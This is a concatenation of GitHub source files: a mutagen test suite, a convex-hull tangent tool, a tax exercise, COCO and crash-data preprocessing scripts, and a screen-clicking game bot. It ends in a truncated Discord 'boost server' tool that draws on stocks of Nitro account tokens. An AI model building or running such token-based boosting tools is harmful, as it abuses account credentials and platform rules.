:)\n def test_many_changes(self, num_runs=5, num_changes=300,\n min_change_size=500, max_change_size=1000,\n min_buffer_size=1, max_buffer_size=2000):\n self.failUnless(min_buffer_size < min_change_size and\n max_buffer_size > max_change_size and\n min_change_size < max_change_size and\n min_buffer_size < max_buffer_size,\n \"Given testing parameters make this test useless\")\n for j in range(num_runs):\n data = b\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" * 1024\n fobj = self.file(data)\n filesize = len(data)\n # Generate the list of changes to apply\n changes = []\n for i in range(num_changes):\n change_size = random.randrange(\n min_change_size, max_change_size)\n change_offset = random.randrange(0, filesize)\n filesize += change_size\n changes.append((change_offset, change_size))\n\n # Apply the changes, and make sure they all took.\n for offset, size in changes:\n buffer_size = random.randrange(\n min_buffer_size, max_buffer_size)\n insert_bytes(fobj, size, offset, BUFFER_SIZE=buffer_size)\n fobj.seek(0)\n self.failIfEqual(fobj.read(len(data)), data)\n fobj.seek(0, 2)\n self.failUnlessEqual(fobj.tell(), filesize)\n\n # Then, undo them.\n changes.reverse()\n for offset, size in changes:\n buffer_size = random.randrange(\n min_buffer_size, max_buffer_size)\n delete_bytes(fobj, size, offset, BUFFER_SIZE=buffer_size)\n fobj.seek(0)\n self.failUnless(fobj.read() == data)\n\n\nclass FileHandlingMockedLock(FileHandling):\n\n def setUp(self):\n def MockLockF(*args, **kwargs):\n raise IOError\n self._orig_lockf = fcntl.lockf\n fcntl.lockf = MockLockF\n\n def tearDown(self):\n fcntl.lockf = self._orig_lockf\n\nif not fcntl:\n del FileHandlingMockedLock\n\n\nclass FileHandlingMockedMMapMove(FileHandling):\n\n def setUp(self):\n class MockMMap(object):\n def __init__(self, *args, **kwargs):\n pass\n\n def move(self, dest, src, count):\n raise ValueError\n\n def close(self):\n pass\n\n self._orig_mmap = mmap.mmap\n mmap.mmap = MockMMap\n\n def tearDown(self):\n mmap.mmap = self._orig_mmap\n\n\nclass FileHandlingMockedMMap(FileHandling):\n\n def setUp(self):\n def MockMMap2(*args, **kwargs):\n raise EnvironmentError\n\n self._orig_mmap = mmap.mmap\n mmap.mmap = MockMMap2\n\n def tearDown(self):\n mmap.mmap = self._orig_mmap\n\n\nclass Tdict_match(TestCase):\n\n def test_match(self):\n self.assertEqual(dict_match({\"*\": 1}, \"a\"), 1)\n self.assertEqual(dict_match({\"*\": 1}, \"*\"), 1)\n self.assertEqual(dict_match({\"*a\": 1}, \"ba\"), 1)\n self.assertEqual(dict_match({\"?\": 1}, \"b\"), 1)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"b\"), 1)\n\n def test_nomatch(self):\n self.assertEqual(dict_match({\"*a\": 1}, \"ab\"), None)\n self.assertEqual(dict_match({\"??\": 1}, \"a\"), None)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"c\"), None)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"[ab]\"), None)\n\n\nclass Tenum(TestCase):\n\n def test_enum(self):\n @enum\n class Foo(object):\n FOO = 1\n BAR = 3\n\n self.assertEqual(Foo.FOO, 1)\n self.assertTrue(isinstance(Foo.FOO, Foo))\n self.assertEqual(repr(Foo.FOO), \"Foo.FOO\")\n self.assertEqual(repr(Foo(3)), \"Foo.BAR\")\n self.assertEqual(repr(Foo(42)), \"Foo(42)\")\n self.assertEqual(str(Foo(42)), \"42\")\n self.assertEqual(str(Foo(1)), \"1\")\n\n\nclass Tdecode_terminated(TestCase):\n\n def test_all(self):\n values = [u\"\", u\"\", u\"\\xe4\", u\"abc\", u\"\", u\"\"]\n\n for codec in [\"utf8\", \"utf-8\", \"utf-16\", \"latin-1\", \"utf-16be\"]:\n # NULL without the BOM\n term = u\"\\x00\".encode(codec)[-2:]\n data = b\"\".join(v.encode(codec) + term for v 
in values)\n\n for v in values:\n dec, data = decode_terminated(data, codec)\n self.assertEqual(dec, v)\n self.assertEqual(data, b\"\")\n\n def test_invalid(self):\n # invalid\n self.assertRaises(\n UnicodeDecodeError, decode_terminated, b\"\\xff\", \"utf-8\")\n # truncated\n self.assertRaises(\n UnicodeDecodeError, decode_terminated, b\"\\xff\\xfe\\x00\", \"utf-16\")\n # not null terminated\n self.assertRaises(ValueError, decode_terminated, b\"abc\", \"utf-8\")\n # invalid encoding\n self.assertRaises(LookupError, decode_terminated, b\"abc\", \"foobar\")\n\n def test_lax(self):\n # missing termination\n self.assertEqual(\n decode_terminated(b\"abc\", \"utf-8\", strict=False), (u\"abc\", b\"\"))\n\n # missing termination and truncated data\n truncated = u\"\\xe4\\xe4\".encode(\"utf-8\")[:-1]\n self.assertRaises(\n UnicodeDecodeError, decode_terminated,\n truncated, \"utf-8\", strict=False)\n\n\nclass Tsplit_escape(TestCase):\n def test_split_escape(self):\n inout = [\n ((\"\", \":\"), [\"\"]),\n ((\":\", \":\"), [\"\", \"\"]),\n ((\":\", \":\", 0), [\":\"]),\n ((\":b:c:\", \":\", 0), [\":b:c:\"]),\n ((\":b:c:\", \":\", 1), [\"\", \"b:c:\"]),\n ((\":b:c:\", \":\", 2), [\"\", \"b\", \"c:\"]),\n ((\":b:c:\", \":\", 3), [\"\", \"b\", \"c\", \"\"]),\n ((\"a\\\\:b:c\", \":\"), [\"a:b\", \"c\"]),\n ((\"a\\\\\\\\:b:c\", \":\"), [\"a\\\\\", \"b\", \"c\"]),\n ((\"a\\\\\\\\\\\\:b:c\\\\:\", \":\"), [\"a\\\\:b\", \"c:\"]),\n ((\"\\\\\", \":\"), [\"\"]),\n ((\"\\\\\\\\\", \":\"), [\"\\\\\"]),\n ((\"\\\\\\\\a\\\\b\", \":\"), [\"\\\\a\\\\b\"]),\n ]\n\n for inargs, out in inout:\n self.assertEqual(split_escape(*inargs), out)\n\n def test_types(self):\n parts = split_escape(b\"\\xff:\\xff\", b\":\")\n self.assertEqual(parts, [b\"\\xff\", b\"\\xff\"])\n self.assertTrue(isinstance(parts[0], bytes))\n\n parts = split_escape(b\"\", b\":\")\n self.assertEqual(parts, [b\"\"])\n self.assertTrue(isinstance(parts[0], bytes))\n\n parts = split_escape(u\"a:b\", u\":\")\n self.assertEqual(parts, [u\"a\", u\"b\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n parts = split_escape(u\"\", u\":\")\n self.assertEqual(parts, [u\"\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n parts = split_escape(u\":\", u\":\")\n self.assertEqual(parts, [u\"\", u\"\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n\nclass TBitReader(TestCase):\n\n def test_bits(self):\n data = b\"\\x12\\x34\\x56\\x78\\x89\\xAB\\xCD\\xEF\"\n ref = cdata.uint64_be(data)\n\n for i in xrange(64):\n fo = cBytesIO(data)\n r = BitReader(fo)\n v = r.bits(i) << (64 - i) | r.bits(64 - i)\n self.assertEqual(v, ref)\n\n def test_read_too_much(self):\n r = BitReader(cBytesIO(b\"\"))\n self.assertEqual(r.bits(0), 0)\n self.assertRaises(BitReaderError, r.bits, 1)\n\n def test_skip(self):\n r = BitReader(cBytesIO(b\"\\xEF\"))\n r.skip(4)\n self.assertEqual(r.bits(4), 0xf)\n\n def test_skip_more(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n self.assertEqual(r.bits(4), 0xa)\n r.skip(8)\n self.assertEqual(r.bits(4), 0xd)\n self.assertRaises(BitReaderError, r.bits, 1)\n\n def test_skip_too_much(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n # aligned skips don't fail, but the following read will\n r.skip(32 + 8)\n self.assertRaises(BitReaderError, r.bits, 1)\n self.assertRaises(BitReaderError, r.skip, 1)\n\n def test_bytes(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n self.assertEqual(r.bytes(2), b\"\\xAB\\xCD\")\n self.assertEqual(r.bytes(0), b\"\")\n\n def test_bytes_unaligned(self):\n 
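# after a 4-bit skip, byte reads straddle the original byte boundaries\n 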
r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n r.skip(4)\n self.assertEqual(r.bytes(2), b\"\\xBC\\xDE\")\n\n def test_get_position(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n self.assertEqual(r.get_position(), 0)\n r.bits(3)\n self.assertEqual(r.get_position(), 3)\n r.skip(9)\n self.assertEqual(r.get_position(), 3 + 9)\n r.align()\n self.assertEqual(r.get_position(), 16)\n\n def test_align(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n r.skip(3)\n self.assertEqual(r.align(), 5)\n self.assertEqual(r.get_position(), 8)\n\n def test_is_aligned(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n self.assertTrue(r.is_aligned())\n\n r.skip(1)\n self.assertFalse(r.is_aligned())\n r.skip(7)\n self.assertTrue(r.is_aligned())\n\n r.bits(7)\n self.assertFalse(r.is_aligned())\n r.bits(1)\n self.assertTrue(r.is_aligned())\n\n\nclass Tset_win32_unicode_argv(TestCase):\n\n def test_main(self):\n old_argv = sys.argv\n try:\n set_win32_unicode_argv()\n if os.name == \"nt\":\n self.assertTrue(isinstance(sys.argv[0], text_type))\n finally:\n sys.argv = old_argv\n","repo_name":"dhamaniasad/mutagen","sub_path":"tests/test__util.py","file_name":"test__util.py","file_ext":"py","file_size_in_byte":24490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35080296196","text":"\"\"\"Test script for finding tangents between two hulls.\"\"\"\n\nfrom ctypes import ArgumentError\nimport os\nfrom datetime import datetime\nfrom typing import List, Text\n\nimport matplotlib\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\n\nfrom point import Point\nimport util\nimport convex_hull\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\n \"left_hullfile\", None, \"The path to an input file containing x,y pairs of coordinates for the left hull.\")\n\n\nflags.DEFINE_string(\n \"right_hullfile\", None, \"The path to an input file containing x,y pairs of coordinates for the left hull.\")\n\nflags.DEFINE_enum(\"tangent\", \"upper\", [\n \"upper\", \"lower\"], \"Which of the tangents to find, \\\"upper\\\" or \\\"lower\\\".\")\n\nflags.DEFINE_bool(\n \"show_plot\", True, \"Whether or not to plot the associated tangent points.\")\n\n\ndef print_usage():\n \"\"\"Prints usage information for the tool.\"\"\"\n print(\"\"\"\nUsage: rightmost_point.py --left_hullfile=[hullfile] --right_hullfile=[hullfile]\"\"\")\n\n\ndef main(argv):\n del argv # unused\n\n left_hull = util.fetch_input_points(FLAGS.left_hullfile)\n right_hull = util.fetch_input_points(FLAGS.right_hullfile)\n\n l_point = max(left_hull, key=lambda p: p.x)\n r_point = min(right_hull, key=lambda p: p.x)\n center_x = l_point.x + ((r_point.x - l_point.x) / 2)\n l_index = left_hull.index(l_point)\n r_index = right_hull.index(r_point)\n\n if FLAGS.tangent == \"upper\":\n l_index, r_index = convex_hull.find_upper_tangent(\n left_hull, l_index, right_hull, r_index, center_x)\n elif FLAGS.tangent == \"lower\":\n l_index, r_index = convex_hull.find_lower_tangent(\n left_hull, l_index, right_hull, r_index, center_x)\n else:\n raise ArgumentError()\n\n l_point = left_hull[l_index]\n r_point = right_hull[r_index]\n if (FLAGS.show_plot):\n util.show_plot(hulls=[left_hull, right_hull],\n lines=[[l_point, r_point]],\n labels={l_point: \"l\", r_point: \"r\"})\n logging.info(f\"Left Point: {l_point} | Right Point: {r_point}\")\n\n\nif __name__ == \"__main__\":\n FLAGS.logtostderr = True\n flags.mark_flag_as_required('left_hullfile')\n flags.mark_flag_as_required('right_hullfile')\n\n 
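# pick a GUI backend before running so show_plot can open a window\n 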
matplotlib.use(\"TkAgg\")\n app.run(main)\n","repo_name":"zhavens/convex_hull","sub_path":"tools/find_tangent.py","file_name":"find_tangent.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018546028","text":"'''\nUma empresa vende o mesmo produto para quatro diferentes estados. Cada estado\npossui uma taxa deferente de imposto sobre o produto (MG:7%; SP:12%; RJ:15%; MS:8%).\nFaça um programa em que o usuário entre com valor e o estado destino do produto\ne o Programa retorne o preço final do produto acrescido do imposto do estado em que ele será vendido.\nSe o estado digitado não for válido, mostrar uma mensagem de erro.\n'''\n\nvprod = float(input('Valor do produto: R$ '))\nestado = str(input('Estado de destino: ')).strip()[0:1].upper()\n\nif estado in 'MG':\n imposto = vprod * 7 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'SP':\n imposto = vprod * 12 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'RJ':\n imposto = vprod * 15 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'MS':\n imposto = vprod * 8 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelse:\n print('Erro!')\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 5/Exercicios/EX24.py","file_name":"EX24.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41669031628","text":"# coding=utf8\r\n# @Time : 2023/10/26 0:07\r\n# @Author : tk\r\n# @FileName: make_data\r\nimport json\r\nimport os.path\r\nfrom shutil import copyfile\r\nimport datasets\r\nfrom torchvision.datasets.coco import CocoDetection\r\nfrom pathlib import Path\r\n\r\nclass MyCocoDetection(CocoDetection):\r\n def _load_image(self, id: int) :\r\n path = self.coco.loadImgs(id)[0][\"file_name\"]\r\n return os.path.join(self.root, path)\r\n\r\n def __getitem__(self, idx):\r\n img, target = super(MyCocoDetection, self).__getitem__(idx)\r\n image_id = self.ids[idx]\r\n target = {'image_id': image_id, 'annotations': target}\r\n return img, target\r\n\r\n\r\ndef build(coco_path,image_set,outfile,limit_n=-1):\r\n root = coco_path\r\n assert root.exists(), f'provided COCO path {root} does not exist'\r\n mode = 'instances'\r\n PATHS = {\r\n \"train\": (root / \"train2017\", root / \"annotations\" / f'{mode}_train2017.json'),\r\n \"val\": (root / \"val2017\", root / \"annotations\" / f'{mode}_val2017.json'),\r\n }\r\n\r\n img_folder, ann_file = PATHS[image_set]\r\n dataset = MyCocoDetection(img_folder, ann_file)\r\n if limit_n < 0:\r\n limit_n = len(dataset)\r\n with open(outfile,mode='w',encoding='utf-8') as f:\r\n for i in range(min(len(dataset),limit_n)):\r\n path,labels = dataset[i]\r\n f.write(json.dumps({\r\n \"path\": path,\r\n \"labels\": labels\r\n },ensure_ascii=False) + '\\n')\r\n\r\n\r\n\r\n\r\n\r\ndata_dir = Path(\"/data/cv/data/coco\")\r\n\r\nbuild(data_dir,\"train\",\"train.json\",100)\r\n\r\nbuild(data_dir,\"val\",\"dev.json\",20)\r\n","repo_name":"ssbuild/detection_finetuning","sub_path":"data/make_data_sample.py","file_name":"make_data_sample.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25045878128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 19 23:19:53 2023\n\n@author: betsa\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom 
sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.compose import make_column_selector as selector\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.impute import SimpleImputer\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# **- fill the unknown with the most frequent value in each column\ndef fill_missing_most_frequent(Data, col_name, missing_val, strategy_method): \n    mostfreq_imputer = SimpleImputer(missing_values=missing_val, strategy=strategy_method)\n    Data[col_name] = mostfreq_imputer.fit_transform(Data[col_name].values.reshape(-1,1))\n    return Data\n\n# **- Convert time to categorical \ndef convert_time_category(Data):\n    \n    X_value = Data['Time']\n    num_samples = np.shape(X_value)[0]\n    newtime = np.zeros((num_samples, 2))\n    i = 0\n    for time in X_value:\n        t = time.split(':')\n        hour = int(t[0])\n        minute = int(t[1])\n        # Work in minutes since midnight so the window checks are exact:\n        # AM peak is 6:30-9:30, PM peak is 15:30-18:30.\n        t_min = hour * 60 + minute\n        if 6 * 60 + 30 <= t_min <= 9 * 60 + 30:\n            newtime[i, 0] = 1  # AM peak\n        if 15 * 60 + 30 <= t_min <= 18 * 60 + 30:\n            newtime[i, 1] = 1  # PM peak\n        i = i + 1\n\n    Data['AM_Peak'] = newtime[:, 0].tolist()\n    Data['PM_Peak'] = newtime[:, 1].tolist()\n\n\n# **- Convert Date to categorical \ndef convert_Date_category(Data):\n    \n    X_value = Data['Date']\n    # Map the month component (handles both '01' and '1') to its name.\n    month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',\n                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n    newDate = []\n    for Date in X_value:\n        t = Date.split('/')\n        newDate.append(month_names[int(t[1]) - 1])\n\n    Data['Date'] = newDate\n\n\n#------------------------------------------------------------------------------\n#------------------------------------------------------------------------------\n#------------------------------------------------------------------------------\n# 1- Read Data\nData = pd.read_csv('CrashMLB8_new_mine.csv')\nprint(\"------------Data information----------------\")\nprint(Data.info())\n\nAll_col_names = ['CodeAccide','LGA_NAME', 'Location', 'Date','Time',\n                 'Type',\t\n                 'DayWeek', 'Light',\t'TypeInters',\t'SpeedZone',\n                 'AirCond', \t'VehiNum',\t'PersNum',\n                 'PersNum1',\t'PersInj2Nu',\t'PersInj3Nu', 'PersKillNu',\n                 'SEVERITY',\t'PersNoInjN']\n\n\n# 2- Drop unrelated columns and the duplicated column (\"CrashCount\" and \"PersNum\" are the same)\nData = Data.drop(columns=[\"SA2C2016\",\t\"SA2N2017\",\t\"SA1_20\",\t\"SA2_20\",\n                          \"PostCode\", \"months\",'DCA','Type'])\n\n# 3- Drop duplicated rows\nData = Data.drop_duplicates(subset = 'CodeAccide')\nprint(\"number of samples after drop duplicate =\", np.shape(Data['CodeAccide'])[0])\nprint('Data set info after removing duplicates:')\nprint(Data.info())\n\n\n# 4- fill missing values by most common\nNewData = Data.copy() \nNewData = fill_missing_most_frequent(NewData, 'LGA_NAME', np.nan 
,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'Light', 'Unknown','most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'TypeInters', 'Unknown','most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 777,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 888,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 999,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'AirCond', 'Not known','most_frequent')\n\nprint(\"-----------New Data set info--------------------\")\nprint (NewData.info())\n\n\n\n\n# 5- set time and date\nconvert_Date_category(NewData)\nprint('unique value Date:', np.unique(NewData['Date']))\n\n\nconvert_time_category(NewData)\nNewData = NewData.drop(columns=['Time'])\nprint (\"-------------------New dataset info after inserting time features---------------------\")\nprint (NewData.info())\n\n# 6- Select categorical and numeric column\nnumerical_columns_selector = selector(dtype_exclude=object)\ncategorical_columns_selector = selector(dtype_include=object)\n\nnumerical_columns_name = numerical_columns_selector(NewData)\ncategorical_columns_name = categorical_columns_selector(NewData)\n\n# 7- ColumnTransformer \ncategorical_features = NewData[categorical_columns_name[1:8]] #1 :10\nonehot_encoder = OneHotEncoder(sparse=False, handle_unknown= 'ignore')\ncategorical_transformed_features = onehot_encoder.fit_transform(categorical_features)\nmap_categorical_name=onehot_encoder.get_feature_names_out()\n\n# 8-Create a new Dataset with new features\nnumerical_features = NewData[numerical_columns_name]\nnumerical_features = np.array(numerical_features)\nlabels = NewData[\"SEVERITY\"] \nlabels = labels.tolist()\nAll_features = np.concatenate((categorical_transformed_features,numerical_features), axis= 1)\nfeatures_name= map_categorical_name.tolist() + numerical_columns_name \nNewData1 = pd.DataFrame(data = All_features, \n index = range(np.shape(All_features)[0]),\n columns = features_name)\n\nNewData1['SEVERITY'] = labels\ntemp = NewData['CodeAccide'].tolist()\nNewData1['CodeAccide'] = temp\nprint (\"========================Created Dataset info=======================================\") \nprint(NewData1.info())\n\n# 9-Write in the csv file\nNewData1.to_csv('New_Dataset2.csv', index = False)\n\n\n \n","repo_name":"Betsabeh/Predicting-Injury-Risk-","sub_path":"Crash_RandomForest/Create_newDataset.py","file_name":"Create_newDataset.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31599393220","text":"import os\nfrom cv2 import imwrite\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nfrom tensorflow import keras\nimport tensorflow as tf\nimport numpy as np \nfrom pyautogui import screenshot,click\nimport keyboard\nfrom time import sleep\n#from datetime import datetime\nmodel = tf.keras.models.load_model('./hdf5/model2.h5')\nc = 36\ndef predict():\n global c\n img = (np.array(screenshot()))[820:1020,1400:1600]\n img_array = tf.expand_dims(img, 0)\n predictions = (model.predict(img_array))[0][0]\n score = 1 if predictions > 0.5 else 0\n if score:\n c+=1\n imwrite(\"./data/1/image_{}.png\".format(c), img)\n \n\n return score\n\nstarted = False\nprint('***Ready***')\ntry:\n while True:\n if started:\n #sleep(0.01)\n #t1 = datetime.now()\n score = predict()\n if score:\n click(x=1000,y=1060)\n #t2 = datetime.now()\n #t = t2-t1\n #print(t.microseconds)\n elif 
keyboard.is_pressed('space'):\n started = True\n print('***started***')\n\n if keyboard.is_pressed('tab'):\n print('***over***')\n started = False\n break\n elif keyboard.is_pressed('p'):\n print('***Paused***')\n started = False\n \nexcept KeyboardInterrupt:\n print('Keyboard Interrupt')\n","repo_name":"vylhart/Project-Budweiser","sub_path":"runModel.py","file_name":"runModel.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32549525370","text":"'''This is to get the operations performed while creating the required dataframe\nAlso takes care of the percentage-wise dataset which is demanded\n'''\n\n'''Library imports'''\nimport pandas as pd\nfrom scipy.io import loadmat\nfrom tqdm import tqdm\nimport glob\nimport os\n\n\nclass images_folder_path:\n\n ''' class to set the folder-path of images, given the data_type that we deal with'''\n\n def __init__(self, raw_dataset_path, data_type):\n self.raw_dataset_path = raw_dataset_path\n self.data_type = data_type\n def wider_face_way(self):\n '''images folder path as required by yolov5'''\n self.folders_path = os.path.join(self.raw_dataset_path, self.data_type,'images')\n\n\nclass dframe_imagepaths:\n\n '''\n arrangement : folder => {folder1, fodler2, folder3, folder4,....}\n every folder contains different differnt images\n folder1 = {img1, img2, img3, ....}\n Class to create dataframe of foldername and imagename given the path of that folder\n '''\n\n def __init__(self, folders_path_images):\n self.df = pd.DataFrame(columns = ['folder_name', 'image_name'])\n self.folders_path_images = folders_path_images\n def images_based_df(self):\n '''formation of df based on folder and images stored inside the storage'''\n for folder in tqdm(os.listdir(self.folders_path_images)):\n for image in os.listdir(os.path.join(self.folders_path_images,folder)):\n self.df.loc[len(self.df.index)] = [folder, image]\n\nclass labels_folder_path:\n\n '''class to set the folder path of labels, given the data_type that we deal with'''\n\n def __init__(self, raw_dataset_path, data_type):\n self.raw_dataset_path = raw_dataset_path\n self.data_type = data_type\n def wider_face_way(self):\n '''Labels fodler path as required by yolov5'''\n self.folders_path = os.path.join(self.raw_dataset_path, self.data_type,'labels')\n\nclass dframe_labels_train_and_val:\n\n '''Getting the labels for train and validation arranged inside the dataframe'''\n\n def __init__(self, folders_path_labels):\n self.df = pd.DataFrame(columns = ['image_name', 'bbox'])\n self.folders_path_labels = folders_path_labels\n def labels_based_df_for_matfiles(self):\n '''To create image and label specific dataframe\n loading the labels from .mat file'''\n for file in glob.glob(os.path.join(self.folders_path_labels,\"*.mat\")):\n annots = loadmat(file)\n \n '''formation of df based on label annotaions inside the .mat labels file'''\n for f, folder in enumerate(tqdm(annots['file_list'])):\n for im, image in enumerate(folder[0]):\n boxes_per_image=[]\n for box in annots['face_bbx_list'][f][0][im][0]:\n boxes_per_image.append(box)\n self.df.loc[len(self.df.index)] = [image[0][0]+'.jpg', boxes_per_image]\n\nclass images_labels_merged_df:\n\n '''get the merged dataframe of [folder_path, image_name] and [image_name, bbox]'''\n\n def __init__(self, df1_sample, df2_sample):\n self.df1_sample = df1_sample\n self.df2_sample = df2_sample\n def merge_df(self):\n '''Merge of this : [folder_path, image_name] and [image_name, 
bbox]'''\n self.df_merged = self.df1_sample.merge(self.df2_sample, on='image_name', how = 'inner')\n\n\nclass image_folder_images_as_grouped:\n \n '''get the dataframe as the groups of folder_name then as the groups of image_name\n this is the required df for all dataframes'''\n\n def __init__(self, df_merged, DF_FRAC):\n self.groups = df_merged.groupby(['folder_name', 'image_name'])\n self.df_frac = DF_FRAC\n def grouping(self):\n '''Groups are all unique and folder name and then image name are all uniques, so we get full dataframe'''\n self.df_full = self.groups.first()\n \n '''getting the fraction dataframe as demanded'''\n self.df_required_sample = self.df_full.sample(frac= self.df_frac, random_state = 1)\n\n\n\nclass three_dataframe_preparation:\n \n '''To get all the 3 required dataframes that too based on percentage of dataset which is required.'''\n \n def __init__(self, data_type_train, train_frac, data_type_validation, validation_frac, data_type_test, test_frac, raw_dataset_path):\n self.data_type_train = data_type_train\n self.train_frac = train_frac\n self.data_type_validation = data_type_validation\n self.validation_frac = validation_frac\n self.data_type_test = data_type_test\n self.test_frac = test_frac\n self.raw_dataset_path = raw_dataset_path\n\n def dataframe_preparation(self, dtype, frac):\n '''\n Dataframe perparation begins with the mentioned dtype and fraction of dataet required\n\n - dataframe image folders path\n - dataframe images paths\n - image-folder-images-grouped(for train-val-test)\n\n - dataframe labels folder path\n - dataframe labels(name same as image) | We get the labels from .mat files\n - labels grouped(for train-val)\n\n - grouping and merging the images and labels info\n '''\n folders_path_images = images_folder_path(self.raw_dataset_path, dtype)\n folders_path_images.wider_face_way()\n df1 = dframe_imagepaths(folders_path_images.folders_path)\n df1.images_based_df()\n\n if dtype == 'test':\n df_grouped = image_folder_images_as_grouped(df1.df, frac)\n df_grouped.grouping()\n return df_grouped.df_required_sample\n \n \n else:\n folders_path_labels = labels_folder_path(self.raw_dataset_path, dtype)\n folders_path_labels.wider_face_way()\n df2 = dframe_labels_train_and_val(folders_path_labels.folders_path)\n df2.labels_based_df_for_matfiles()\n\n img_lbl_df = images_labels_merged_df(df1.df, df2.df)\n img_lbl_df.merge_df()\n\n df_grouped = image_folder_images_as_grouped(img_lbl_df.df_merged, frac)\n df_grouped.grouping()\n return df_grouped.df_required_sample\n\n def get_train_test_val(self):\n '''Getting the required train, val and test dataframe'''\n self.train = self.dataframe_preparation(self.data_type_train, self.train_frac)\n self.validation = self.dataframe_preparation(self.data_type_validation, self.validation_frac)\n self.test = self.dataframe_preparation(self.data_type_test, self.test_frac)\n\n","repo_name":"vishalw-iitk/Widerface_Yolov5","sub_path":"Data_preparation/df_percent.py","file_name":"df_percent.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11118042513","text":"import colorama, httpx, base64, sys, time, os, threading\r\nfrom pathlib import Path\r\nfrom colorama import Fore, init, Style, Back\r\nimport boostingshit\r\nfrom boostingshit import thread_boost, boost_server\r\n\r\ndef cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef getinviteCode(invite_input):\r\n if \"discord.gg\" not in invite_input:\r\n 
return invite_input\r\n    # The early return above guarantees the link contains \"discord.gg/\",\r\n    # so a single split handles both plain and https:// forms.\r\n    invite = invite_input.split(\"discord.gg/\")[1]\r\n    return invite\r\n\r\ndef inputNumber(message):\r\n    while True:\r\n        try:\r\n            userInput = int(input(message))\r\n        except ValueError:\r\n            print(Fore.RED + \"This value must be a number!\" + Fore.WHITE)\r\n            continue\r\n        else:\r\n            return userInput\r\n\r\ndef mainmenu():\r\n    printwatermark()\r\n    home = (Fore.CYAN + f'''\r\n    1. Boost Server\r\n    2. View Stock\r\n    3. Check Nitro Tokens\r\n    4. Exit\r\n''' + Fore.WHITE)\r\n    for char in home:\r\n        time.sleep(0.00009)\r\n        sys.stdout.write(char)\r\n        sys.stdout.flush()\r\n    choices = input()\r\n    if choices == \"1\":\r\n        typeofboost = inputNumber(Fore.CYAN + \"Duration of Boost [90 or 30 days]: \" + Fore.WHITE)\r\n        while typeofboost != 90 and typeofboost != 30:\r\n            print(Fore.RED + \"Duration can either be 30 days or 90 days\" + Fore.WHITE)\r\n            typeofboost = inputNumber(Fore.CYAN + \"Duration of Boost [90 or 30 days]: \" + Fore.WHITE)\r\n        if typeofboost == 90:\r\n            file = \"3m_tokens.txt\"\r\n        if typeofboost == 30:\r\n            file = \"1m_tokens.txt\"\r\n        \r\n        if checkEmpty(file) == True:\r\n            print()\r\n            print(Fore.RED + \"No Stock\" + Fore.WHITE)\r\n            print()\r\n            input(\"Press Enter To Continue...\")\r\n            cls()\r\n\r\n            mainmenu()\r\n\r\n        \r\n        invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n        while invite_input.isdigit():\r\n            print(Fore.RED + \"Invite Link cannot be a number\" + Fore.WHITE)\r\n            invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n\r\n        invite = getinviteCode(invite_input)\r\n        valid_invite = validateInvite(invite)\r\n        while valid_invite == False:\r\n            print(Fore.RED + f\"Invalid 